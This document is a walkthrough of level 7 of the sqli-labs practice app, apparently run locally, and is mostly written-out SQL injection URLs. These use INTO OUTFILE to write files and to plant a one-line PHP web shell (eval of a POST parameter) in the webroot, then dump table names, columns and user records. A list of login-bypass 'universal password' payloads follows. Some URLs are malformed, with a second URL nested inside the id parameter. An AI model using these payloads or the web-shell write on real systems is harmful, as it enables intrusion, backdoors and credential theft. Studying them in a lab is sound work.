sqli-labs7
7:
Single quote injection with double brackets:
Levels 1-6 are for returning error information. We first select a level for error injection to obtain the absolute path of the website, @@datadir obtains the database storage data path, @@basedir is MYSQL obtains the installation path:
It is very difficult to obtain the absolute path of the website in practice.
Read and write permission test:
MySQL controls user access to the database through a permission table. The permission table is stored in the mysql database. The main permission tables are as follows: user, db, host, table_priv, columns_priv and procs_priv.
Return to normal, with read permission.
localhost:81/sqli-labs/Less-7/?id=-1')) union select 1,2,3 into outfile “H:\xampp\htdocs\sqli-labs\Less-7\test.txt” – #
Although an error was reported, it can be seen from the background that the test.txt file has been generated. Union is a joint query, so there is not much difference between using 1 or -1.
\ Will be treated as an escape character in the url, so here we use \, and the result is \.
Directly write a sentence of Trojan horse:
http://localhost:81/sqli-labs/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20@eval ($_POST[%22pass%22])%20?%3E%27%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\test.php%22%20–%20#
Because php is a back-end language, the php source code cannot be seen when accessed by the front-end browser.
Guess the field: http://localhost:81/sqli-labs/Less-7/?id=1%27))%20order%20by%203%20–%20#
Into outfile, view the username and database name:
http://localhost:81/sqli-labs/Less-7/?id=-1%27))%20union%20select%201,user(),database()% 20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\1.txt%22%20–%20#
查看表名:
http://localhost:81/sqli-labs/Less-7/?id=http://192.168.33.1/sqli/Less-7/?id=-1%27))%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\biao.txt%22%20–%20#
查字段:
http://localhost:81/sqli-labs/Less-7/?id=http://192.168.33.1/sqli/Less-7/?id=-1%27))%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\ziduan.txt%22%20–%20#
查看users表中数据:http://localhost:81/sqli-labs/Less-7/?id=http://192.168.33.1/sqli/Less-7/?id=-1%27))%20union%20select%20*%20from%20users%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\users.txt%22%20–%20#
Tips: Universal Password
Priority: Arithmetic operator>Relation>Assignment>Logic
= is preferred to and, and is preferred to or
Select… from… where user='admin' and password='2' or '1';
two values are used for logical or operation, sql The query result of the statement is true, which means that the authentication is successful and the system can be successfully logged in.
asp aspx universal password
"or “a”="a
')or('a'='a
or 1=1
–
'or 1=1– a'or' 1=1–
"or 1=1 – 'or
' a'='a
“or”="a'='
a'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1 =
1'OR 1=1%00
"or 1=1%
00'xor
PHP universal password'or
1=1/*
User: something
Pass: 'OR '1'='1
jsp universal password
1'or'1' ='1
admin' OR 1=1/*